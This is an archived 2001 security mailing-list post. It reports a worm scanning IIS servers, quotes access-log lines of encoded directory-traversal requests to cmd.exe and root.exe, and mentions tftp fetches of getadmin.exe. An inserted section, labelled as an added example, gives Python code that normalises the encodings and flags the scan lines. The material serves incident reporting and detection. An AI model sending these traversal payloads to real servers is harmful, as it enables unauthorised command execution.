In addition to this, we are seeing attempts to tftp getadmin.exe. What is going on here? It started at 9:20 am and there are some 20,000 alarms on the IDS.

Ed

--- Cory McIntire <coryat_private> wrote:
> Hello,
> I and a few others I know are getting bombarded on our machines with IIS
> requests....looks like another worm, and it's much smarter than before, it
> seems to stay within the same class A and sometimes the same class B as the
> attacking machine is in. here is an excerpt of what i believe is the full
> scan....
>
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>
> just thought I would let you guys know...this one looks bad fella.....thank
> god for apache.....that is of course, if there isn't a huge bog down on the
> net....=[
>
> cory
>
> -----------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
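The quoted log shows the same traversal to cmd.exe tried under a dozen encodings (double percent-encoding such as %255c, overlong two-byte forms such as %c0%af and %c1%9c). A plain string match on the raw request line misses most of them, so a detector has to normalise first. The following is an added example, not code from the post or from any of the tools it names: it decodes request paths the way the lenient IIS decoder effectively did (an assumed model: two percent-decoding passes, then the low six bits of the second byte for any %c0/%c1 pair), flags requests that reach cmd.exe or root.exe after normalisation, and counts them per source address. The sample log is constructed in the shape of the lines quoted above.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample in the shape of the access-log lines quoted in the post
# (source address and paths taken from the post; last line is a benign request).
SAMPLE_LOG = """\
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
10.0.0.7 - - [18/Sep/2001:09:36:01 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
TARGETS = ("/winnt/system32/cmd.exe", "root.exe")   # what every scan line reaches for

def iis_lenient_decode(path):
    """Normalise a path the way the vulnerable IIS decoder effectively did
    (assumed model): percent-decode twice (%255c -> %5c -> backslash) and fold
    overlong two-byte 'UTF-8' forms like %c0%af / %c1%9c into the ASCII byte they
    stand for (low six bits of the second byte, so even %c1%1c yields a backslash)."""
    raw = unquote_to_bytes(unquote_to_bytes(path))   # bytes in, so no UTF-8 re-encoding
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    # backslash is a separator on Windows; compare case-insensitively
    return out.decode("latin-1").replace("\\", "/").lower()

def classify(line):
    """Return (source_ip, normalised_path) for a line that reaches a shell
    binary through an encoded path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, _method, path, _status = m.groups()
    norm = iis_lenient_decode(path.split("?", 1)[0])
    return (src, norm) if any(t in norm for t in TARGETS) else None

def scan(log_text):
    """Flag scan lines and count them per source address."""
    hits = [h for h in map(classify, log_text.splitlines()) if h]
    return hits, Counter(src for src, _ in hits)
```

Run against a real access log the per-source counter is the quickest way to see the "same class A / class B" pattern Cory describes, since the flagged sources cluster with the server's own address.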
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:15:37 PDT